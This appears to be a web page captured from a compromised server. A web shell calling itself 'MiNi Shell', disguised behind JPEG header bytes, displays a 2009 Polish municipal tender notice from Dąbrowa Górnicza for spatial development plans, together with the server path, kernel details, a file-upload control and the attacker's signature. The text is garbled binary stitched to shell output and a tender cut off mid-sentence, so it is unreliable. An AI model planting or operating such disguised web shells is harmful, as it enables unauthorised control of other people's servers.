JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090309/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090309/54642-N-2009.html

<p class="kh_header"><b>Dąbrowa Górnicza: Sporządzenie miejscowych planów zagospodarowania przestrzennego miasta Dąbrowa Górnicza: ZADANIE A:  Miejscowy plan zagospodarowania przestrzennego miasta Dąbrowa Górnicza dla terenu górniczego Kopalni Dolomitów -Ząbkowice 
ZADANIE B: Miejscowy plan zagospodarowania przestrzennego miasta Dąbrowa Górnicza dla terenów położonych w rejonie ulic: Brzozowa - Wczasowa</b><br>
<b>Numer ogłoszenia: 54642 - 2009; data zamieszczenia: 09.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski , ul. Graniczna 21, 41-300 Dąbrowa Górnicza, woj. śląskie, tel. 032 2956700, faks 032 2625032, 2956700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.dabrowa-gornicza.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sporządzenie miejscowych planów zagospodarowania przestrzennego miasta Dąbrowa Górnicza: ZADANIE A:  Miejscowy plan zagospodarowania przestrzennego miasta Dąbrowa Górnicza dla terenu górniczego Kopalni Dolomitów -Ząbkowice 
ZADANIE B: Miejscowy plan zagospodarowania przestrzennego miasta Dąbrowa Górnicza dla terenów położonych w rejonie ulic: Brzozowa - Wczasowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Postępowanie o udzielenie zamówienia prowadzone jest w trybie przetargu nieograniczonego o wartości zamówienia poniżej kwot określonych w przepisach wydanych na podstawie art.11 ust.8  ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz.U. z 2007 r. Nr 223, poz. 1655 
z późn. zm.).
2.ZADANIE A1. Miejscowy plan zagospodarowania przestrzennego miasta Dąbrowa Górnicza dla terenu górniczego Kopalni Dolomitów Ząbkowice, -zgodnie z uchwałą inicjującą nr XXX/522/08 Rady Miejskiej w Dąbrowie Górniczej z dnia 24 września 2008 roku,2. Skala 1:2000,3. Powierzchnia obszaru objętego planem wynosi ~ 191,7 ha.
ZADANIE  B
 1.Miejscowy plan zagospodarowania przestrzennego miasta Dąbrowa Górnicza dla terenów położonych w rejonie ulic: Brzozowa - Wczasowa -zgodnie z uchwałą inicjującą nr XXI/328/07 Rady Miejskiej w Dąbrowie Górniczej z dnia 19grudnia 2007 roku,2. Skala 1:2000 ,3. Powierzchnia obszaru objętego planem wynosi ~ 30,0 ha.
3.Każda dokumentacja planistyczna ,dot. Zadania A i Zadania B składać się będzie z:A .Diagnozy stanu istniejącego wraz z koncepcją rozwiązań planu - 2 egz.
B. Opracowania ekofizjograficzne w skali 1: 2000 - 2 egz.
C. Prognozy oddziaływania  na środowisko w skali 1: 2000 - 4 egz.
D. Prognozy skutków finansowych uchwalonego planu - 4 egz
E. Ustaleń planu i rysunku planu w skali 1: 2000 w formie projektu Uchwały Rady Miejskiej - 6 egz.
F. Dokumentacji formalno-prawnej - 2 egz.
G. Wniosku o uzyskanie zgody na przeznaczenie gruntów   leśnych na cele nieleśne zgodnie z ustawą z dnia 03.02.1994r. o ochronie gruntów rolnych i leśnych, o ile z koncepcji zagospodarowania wyniknie konieczność jego sporządzenia -6 egz.
4.Dokumentacja planistyczna ,dot. Zadania A i Zadania B  winna być opracowana zgodnie z ustawą o planowaniu i zagospodarowaniu przestrzennym (Dz.U. z 2003 r. nr 80 poz. 717 z późn. zm.) oraz Rozporządzeniem Ministra Infrastruktury w sprawie wymaganego zakresu projektu planu miejscowego (Dz. U. z 2003r. Nr 164 poz. 1587).
5.Wszystkie elementy dokumentacji planistycznej,dot. Zadania A i Zadania B winny być sporządzone w formie papierowej w ilościach egzemplarzy wymienionych powyżej oraz w formie elektronicznej na nośniku cyfrowym.
6.Rysunki planów,dot. Zadania A i Zadania B w skali 1:2000 winny być wykonane na podkładzie sytuacyjno-  wysokościowym z oznaczeniem własności, w formie papierowej, w tym 1 z kompletów należy wykonać na twardym podkładzie oraz w formie elektronicznej na nośniku cyfrowym w formacie JPG oraz w programie jakim dysponuje Gmina tj.  MAPINFO,
7.Wykonawca będzie zobowiązany do obsługi formalno - prawnej oraz kancelaryjnej związanej z tokiem prac przy wykonaniu zadań,dot. Zadania A i Zadania B oraz do przygotowania odpowiedniej ilości projektów do uzgadniania i opiniowania,
8.Wykonawca będzie zobowiązany do oddania przedmiotu zamówienia na zaktualizowanym podkładzie mapowym,dot. Zadania A i Zadania B..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.Wykonawcy ubiegający się o udzielenie zamówienia są zobowiązani wnieść wadium zgodnie z art. 45 ust.1 Ustawy w wysokości:  2.100,00 zł na zadanie A i/lub 1.200 zł na zadanie B w formach określonych w art. 45 ust. 6 ustawy Pzp.
2.Wnoszone wadium winno być złożone  w sposób, który wskazuje jakiego zadania/ń dotyczy, jak również forma dokumentu potwierdzającego jego złożenie winna umożliwiać, w przypadku wniesienia wadium na 2 zadania, możliwość odrębnego zwrotu wadium zgodnie  z  dyspozycją art. 46 ust.1  ustawy Pzp bądź jego zatrzymania zgodnie na podstawie art. z art. 46 ust. 5 oraz art. 46 ust. 4 a  ustawy Pzp. 
3 .Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek Zamawiającego:
    Getin Bank S.A. 74 1560  1010  0000  9480  0001  1847
4. Do oferty należy dołączyć kopię polecenia przelewu potwierdzoną przez Wykonawcę. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym. 
5.W przypadku wyboru formy niepieniężnej wadium, oryginał dokumentu należy złożyć w Wydziale Księgowo-Budżetowym Urzędu Miejskiego w Dąbrowie Górniczej ul. Graniczna 21,III piętro, pokój nr 320. Natomiast do oferty należy dołączyć kserokopię złożonego dokumentu, potwierdzoną za zgodność z oryginałem przez Wykonawcę.
6.Zwrot wadium  - zgodnie z art. 46 ust.1  ustawy Pzp.
7. Zatrzymanie wadium- zgodnie z art. 46 ust. 5 oraz art. 46 ust. 4 a ustawy Pzp. 8.Termin wniesienia wadium -  przed upływem terminu składania ofert.
9.Wykonawcy, którzy nie wniosą wadium, w tym również na przedłużony okres związania ofertą lub nie zgodzą się na przedłużenie okresu związania ofertą zostaną wykluczeni z postępowania (art. 24 ust. 2  pkt 4  ustawy Pzp).
10.Ważność wadium w formie niepieniężnej winna obejmować okres:17.03.2009 r. do 15.04.2009 r.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia określonego w części I  specyfikacji mogą ubiegać się wykonawcy, którzy:
1.Spełniają wymagania określone w art. 22 ust.1 ustawy Pzp i nie podlegają wykluczeniu na podstawie art. 24 ust.1 i 2 ustawy Pzp -  warunek wspólny do Zadania A i  Zadania B.
2.Nie zalegają z opłacaniem podatków, opłat oraz składek na ubezpieczenie społeczne i zdrowotne z wyjątkiem przypadków, gdy uzyskali oni przewidzianą prawem zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - warunek wspólny do Zadania A i  Zadania B.
3.W okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie  zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali , a  w przypadku usług okresowych lub ciągłych są również w trakcie wykonywania, co najmniej 3 usługi odpowiadające swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia, których należyte wykonanie zostało potwierdzone. Przez usługę odpowiadającą swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia należy rozumieć wykonanie miejscowego planu zagospodarowania przestrzennego o wartości min. 60 tys. brutto zł każdy, który został opublikowany w Dzienniku Urzędowym - warunek wspólny do Zadania A i  Zadania B. 
4.Dysponują osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia tj.:
a)głównym projektantem, który winien przynależeć do Izby Urbanistycznej,
b)pozostałymi osobami posiadającymi uprawnienia lub kwalifikacje w każdym z wymaganych do sporządzenia planu zakresów,  zgodnie z wymogami ustaw i rozporządzeń tj. prognozy oddziaływania na środowisko, prognozy skutków finansowych uchwalenia planów oraz ekofizjografa - minimum jedna osoba z każdej branży, przy czym dopuszczalne jest posiadanie więcej niż jednego  uprawnienia lub kwalifikacji przez jedną osobę ,warunek wspólny do Zadania A i  Zadania B.
5.Oświadczą, że wykonają rysunek planu metodą cyfrową  i dysponują sprzętem lub legalnym oprogramowaniem , które będzie służyć realizacji zamówienia lub przedłożą pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych narzędzi i urządzeń - warunek wspólny do Zadania A i  Zadania B.
6.Przedstawią dokumentację 1 miejscowego planu zagospodarowania przestrzennego o podobnej problematyce dla miasta liczącego powyżej 100 tys. mieszkańców i powierzchni powyżej 100 km2 - warunek wspólny do Zadania A i  Zadania B.
7.Posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności -  warunek wspólny do Zadania A i  Zadania B.
8.Wniosą wadium na warunkach określonych w pkt. 13 SIWZ -  warunek wspólny do Zadania A i  Zadania B.
Stwierdzenie spełniania warunków - udziału w postępowaniu (formalnych) i zdolności do wykonania zamówienia (merytorycznych)- wymaganych od Wykonawców będzie dokonane w oparciu o złożone wraz z ofertą: oświadczenia o spełnieniu warunków udziału w postępowaniu o udzielenie zamówienia publicznego oraz potwierdzające spełnienie tych warunków dokumenty- według formuły; spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2.Oświadczenie, że Wykonawca spełnia wymagania określone w art. 22 ust. 1 Pzp i nie podlega wykluczeniu z postępowania na podst. art. 24 ust. 1 i 2 Pzp - (wzór oświadczenia - Załącznik nr 2 do SIWZ) - wskazana data podpisania oświadczenia.
3.Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
4.Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności, potwierdzający spełnianie warunku określonego w pkt. 10.4. SIWZ - (wzór wykazu - Załącznik nr 3 do SIWZ) - wskazana data podpisania wykazu.
Wymagane załączenie kserokopii uprawnień i zaświadczeń przynależności do właściwej dla danej specjalności Izby Samorządu Zawodowego, określonych w pkt. 10.4. SIWZ. 
4.1. W przypadku przedstawienia w wykazie osób, którymi Wykonawca będzie dysponował za zgodą innych podmiotów wymagane jest przedłożenie pisemnego zobowiązania tych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia (wzór oświadczenia -Załącznik nr 4 do SIWZ)  - wskazana data podpisania oświadczenia.
5.Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, odpowiadających swoim rodzajem  i wartością usłudze stanowiącej przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania oraz odbiorców potwierdzających spełnianie warunku określonego w pkt. 10.3. SIWZ, (wzór wykazu - Załącznik nr 5 do SIWZ) - wskazana data podpisania wykazu.
6.Dokumenty potwierdzające, że usługi, o których mowa w  pkt. 10.3 SIWZ zostały wykonane należycie, min. 3 np. referencje wystawione przez poprzednich zamawiających/inwestorów każda o wartości min. 60 000,00 zł bruto.
7.Oświadczenie Wykonawcy o wykonaniu rysunku planu metodą cyfrową oraz, że Wykonawca   dysponuje lub będzie dysponował  odpowiednim sprzętem  i legalnym oprogramowaniem, niezbędnych do wykonania zamówienia - według wzoru Zamawiającego stanowiącego Załącznik nr 6 do SIWZ   - wskazana aktualna data podpisania oświadczenia.
7.1. W przypadku przedstawienia w oświadczeniu, o którym mowa w pkt. 11.7 narzędzi i urządzeń niezbędnych do wykonania zamówienia , którymi   Wykonawca będzie  dysponował za zgodą  innych podmiotów  wymagane  jest przedłożenie pisemnego zobowiązania tych podmiotów do ich udostępnienia (wzór oświadczenia -Załącznik nr 7 do  SIWZ)  - wskazana data podpisania.
 8.  Polisa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
 Ponadto do oferty należy załączyć:

9.Formularz ofertowy - wykonany według wzoru Zamawiającego stanowiącego Załącznik nr 1A i (-lub) załącznik 1B - wskazana aktualna data podpisania oferty.
10.Kserokopie potwierdzenia wniesienia wadium na warunkach określonych w pkt. 13 SIWZ.      
11.Opis metodyki sporządzenia miejscowego planu zagospodarowania przestrzennego dla Zadania A i (-lub) Zadania B.
 Metodyka sporządzenia miejscowego planu zagospodarowania przestrzennego winna zawierać następujące elementy:
a) dokumentację planistyczną miejscowego planu zagospodarowania zgodnie z nową ustawą o planowaniu i zagospodarowaniu przestrzennym (tekst jednolity Dz.U.z 2003r.,Nr 80 poz.717 z dnia 27 marca 2003 oraz Rozporządzeniem Ministra Infrastruktury z dnia 26 sierpnia       
2003roku (Dz.U. z 2003r Nr 164 z 19 września 2003 roku)
b) harmonogram terminowo - rzeczowo - finansowy,
c) metodę  opracowania wyceny wraz z uzasadnieniem .
12.Pełnomocnictwo do reprezentowania:
a) wymagane w  przypadku gdy Wykonawcę reprezentuje w postępowaniu osoba bądź osoby, których uprawnienie do reprezentacji nie wynika bezpośrednio z innych załączonych dokumentów, przedłożone w formie oryginału lub kopii poświadczonej przez notariusza,
b) wymagane w przypadku Wykonawców wspólnie ubiegających się o zamówienie, przedłożone w  formie oryginału lub kopii poświadczonej przez notariusza.
Uwagi: 
1. Złożone dokumenty winny być zgodne z Rozporządzeniem Prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form w jakich te dokumenty mogą być składane (Dz. U.  z 2006r. , Nr 87 poz. 605 z późn. zm.).
2. Wykonawca składa oświadczenia i dokumenty przetargowe pod odpowiedzialnością karną /dotyczącą składania nieprawdziwych zeznań i oświadczeń/ wynikającą z art. 297 Kodeksu Karnego. W razie stwierdzenia, że złożone przez wykonawcę informacje są nieprawdziwe Zamawiający zgodnie z dyspozycją art. 304 k.p.k. - zawiadomi o tym fakcie właściwy organ ścigania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 50</li>
<li>2 - Termin wykonania - 10</li>
<li>3 - Ocena jakości opracowania - 40</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.dabrowa-gornicza.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Dąbrowie Górniczej ,ul. Graniczna 2,41-300 Dąbrowa Górnicza 
Wydział Urbanistyki i Architektury , II pietro , pok. 218..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.03.2009 godzina 09:30, miejsce: Urząd Miejski w Dąbrowie Górniczej, ul. Graniczna 21, Wydział Urbanistyki i Architektury, pokój nr 218 piętro II.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia powinni spełniać warunki udziału w postępowaniu określone w punkcie 10  SIWZ. W przypadku wymogów dot. potencjału sprzętowego, ekonomicznego i kadrowego, a także doświadczenia realizacyjnego wystarczające jest łącznie ich spełnienie przez wszystkich wykonawców  składających wspólną ofertę.
2.Dokument wymagany w pkt. 11.1., 11.3.  i 11.8. SIWZ  wykonawcy składają odrębnie, przy czym w przypadku polisy Zamawiający dopuszcza złożenie jednej polisy wystawionej na Wykonawców występujących wspólnie. Dokumenty i oświadczenia wymienione w  pkt. 11.4.- 11.7.1. SIWZ składa  co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Oświadczenie wymienione w pkt.11.2 SIWZ winno zostać podpisane wspólnie (na jednym druku) przez wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Formularz ofertowy (pkt. 11.9 SIWZ) i  Opis metodyki sporządzenia miejscowego planu zagospodarowania przestrzennego dla Zadania A i (-lub) Zadania B (pkt. 11.11 SIWZ) winny zostać podpisane przez uprawnionych przedstawicieli Wykonawców.
3. Wykonawcy ustanawiają Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie  zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia 
publicznego. Preferowane jest, aby Pełnomocnikiem był jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia - pełnomocnictwo winno zostać dołączone do oferty. Pełnomocnictwo winno być złożone w formie oryginałów lub kopii poświadczonej przez notariusza.
4.   Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem . 
5.  Wykonawcy ubiegający się wspólnie o udzielenie zamówienia będą odpowiedzialni solidarnie za wypełnienie zobowiązań umownych.
Zamawiający zażąda od Wykonawcy przed podpisaniem umowy wniesienia zabezpieczenia należytego wykonania umowy w wysokości 2 % wartości wynagrodzenia brutto /odpowiednio dla Zadania A i Zadania B/na warunkach okreslonych w pkt. 14 SIWZ.
Sposób oceny ofert zgodnie z kryterium ocena jakości opracowania.
Podstawą oceny będzie ilość punktów przyznana indywidualnie przez członków komisji przetargowej. Za powyższe kryterium każdy z Wykonawców może otrzymać maksymalną punków od każdego członka komisji przetargowej tj. 100 pkt. 
Dokonując oceny oferty pod względem kryterium oceny jakości opracowania komisja przetargowa będzie brała pod uwagę następujące elementy, którym przyznaje się następujące znaczenie punktowe:
Elementy oceny w kryterium oceny jakości opracowania :1.Jakość opracowań przyrodniczych w tym dokumentacja: ekofizjograficzna oraz prognoza oddziaływania planu na środowisko i ich spójność merytoryczna z dokumentami planistycznymi- max. 30 pkt.,2.a) Elastyczność zapisu tekstu planu w tym wymagania ładu przestrzennego, ochrony wartości architektonicznych i krajobrazowych, wymagania ochrony środowiska, racjonalności struktur osadniczych i sieci infrastruktury i innych, b) Elastyczność formy zapisu w tym:

Creat By MiNi SheLL
Email: jattceo@gmail.com